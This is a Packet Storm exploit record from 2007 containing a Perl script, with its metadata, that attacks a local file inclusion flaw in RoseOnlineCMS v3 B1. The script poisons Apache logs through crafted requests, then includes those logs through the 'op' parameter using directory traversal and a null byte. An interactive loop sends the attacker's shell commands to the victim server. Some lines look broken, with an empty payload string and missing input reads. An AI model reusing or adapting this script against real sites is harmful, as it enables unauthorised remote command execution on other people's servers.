ID PACKETSTORM:55326
Type packetstorm
Reporter Mahmood_ali
Modified 2007-03-24T00:00:00
Description
`#!/usr/bin/perl
# RoseOnlineCMS v3 B1(op)Local File Inclusion Exploit
# P.Script: http://heanet.dl.sourceforge.net/sourceforge/rosecms/RoseOnlineCMS_v3_B1.rar
# V.Code:
# $op = !isset($_GET['op']) ? home : $_GET['op'] ;
#
# if (is_file("modules/".$op.".php")) {
# include("modules/".$op.".php");
#
use IO::Socket;
use LWP::Simple;
#ripped
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
if (@ARGV < 3) {
print "
===============================================================
| RoseOnlineCMS v3 B1(op)Local File Inclusion Exploit |
| Mahmood.pl [Victim] / (apachepath) |
| Ex: Gold.pl [Victim] / ../logs/error.log |
| Coded By Mahmood_ali |
===============================================================
";
exit();
}
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
print "Code is injecting in logfiles...\n";
$CODE="";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "user-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "If not working try another apache path\n\n";
print "[shell] ";$cmd = ;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
#now include parameter
print $socket "GET ".$path."index.php?op=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd = ;
}
`
{"id": "PACKETSTORM:55326", "type": "packetstorm", "bulletinFamily": "exploit", "title": "roc-lfi.txt", "description": "", "published": "2007-03-24T00:00:00", "modified": "2007-03-24T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/55326/roc-lfi.txt.html", "reporter": "Mahmood_ali", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:48", "viewCount": 3, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:22:48", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:48", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/55326/roc-lfi.txt", "sourceData": "`#!/usr/bin/perl \n# RoseOnlineCMS v3 B1(op)Local File Inclusion Exploit \n# P.Script: http://heanet.dl.sourceforge.net/sourceforge/rosecms/RoseOnlineCMS_v3_B1.rar \n# V.Code: \n# $op = !isset($_GET['op']) ? home : $_GET['op'] ; \n# \n# if (is_file(\"modules/\".$op.\".php\")) { \n# include(\"modules/\".$op.\".php\"); \n# \nuse IO::Socket; \nuse LWP::Simple; \n#ripped \n@apache=( \n\"../../../../../var/log/httpd/access_log\", \n\"../../../../../var/log/httpd/error_log\", \n\"../apache/logs/error.log\", \n\"../apache/logs/access.log\", \n\"../../apache/logs/error.log\", \n\"../../apache/logs/access.log\", \n\"../../../apache/logs/error.log\", \n\"../../../apache/logs/access.log\", \n\"../../../../apache/logs/error.log\", \n\"../../../../apache/logs/access.log\", \n\"../../../../../apache/logs/error.log\", \n\"../../../../../apache/logs/access.log\", \n\"../logs/error.log\", \n\"../logs/access.log\", \n\"../../logs/error.log\", \n\"../../logs/access.log\", \n\"../../../logs/error.log\", \n\"../../../logs/access.log\", \n\"../../../../logs/error.log\", \n\"../../../../logs/access.log\", \n\"../../../../../logs/error.log\", \n\"../../../../../logs/access.log\", \n\"../../../../../etc/httpd/logs/access_log\", \n\"../../../../../etc/httpd/logs/access.log\", \n\"../../../../../etc/httpd/logs/error_log\", \n\"../../../../../etc/httpd/logs/error.log\", \n\"../../.. /../../var/www/logs/access_log\", \n\"../../../../../var/www/logs/access.log\", \n\"../../../../../usr/local/apache/logs/access_log\", \n\"../../../../../usr/local/apache/logs/access.log\", \n\"../../../../../var/log/apache/access_log\", \n\"../../../../../var/log/apache/access.log\", \n\"../../../../../var/log/access_log\", \n\"../../../../../var/www/logs/error_log\", \n\"../../../../../var/www/logs/error.log\", \n\"../../../../../usr/local/apache/logs/error_log\", \n\"../../../../../usr/local/apache/logs/error.log\", \n\"../../../../../var/log/apache/error_log\", \n\"../../../../../var/log/apache/error.log\", \n\"../../../../../var/log/access_log\", \n\"../../../../../var/log/error_log\" \n); \nif (@ARGV < 3) { \nprint \" \n=============================================================== \n| RoseOnlineCMS v3 B1(op)Local File Inclusion Exploit | \n| Mahmood.pl [Victim] / (apachepath) | \n| Ex: Gold.pl [Victim] / ../logs/error.log | \n| Coded By Mahmood_ali | \n=============================================================== \n\"; \nexit(); \n} \n$host=$ARGV[0]; \n$path=$ARGV[1]; \n$apachepath=$ARGV[2]; \nprint \"Code is injecting in logfiles...\\n\"; \n$CODE=\"\"; \n$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connection failed.\\n\\n\"; \nprint $socket \"GET \".$path.$CODE.\" HTTP/1.1\\r\\n\"; \nprint $socket \"user-Agent: \".$CODE.\"\\r\\n\"; \nprint $socket \"Host: \".$host.\"\\r\\n\"; \nprint $socket \"Connection: close\\r\\n\\r\\n\"; \nclose($socket); \nprint \"Write END to exit!\\n\"; \nprint \"If not working try another apache path\\n\\n\"; \nprint \"[shell] \";$cmd = ; \nwhile($cmd !~ \"END\") { \n$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connection failed.\\n\\n\"; \n#now include parameter \nprint $socket \"GET \".$path.\"index.php?op=\".$apache[$apachepath].\"%00&cmd=$cmd HTTP/1.1\\r\\n\"; \nprint $socket \"Host: \".$host.\"\\r\\n\"; \nprint $socket \"Accept: */*\\r\\n\"; \nprint $socket \"Connection: close\\r\\n\\r\\n\"; \nwhile ($raspuns = <$socket>) \n{ \nprint $raspuns; \n} \nprint \"[shell] \"; \n$cmd = ; \n} \n \n`\n"}
{}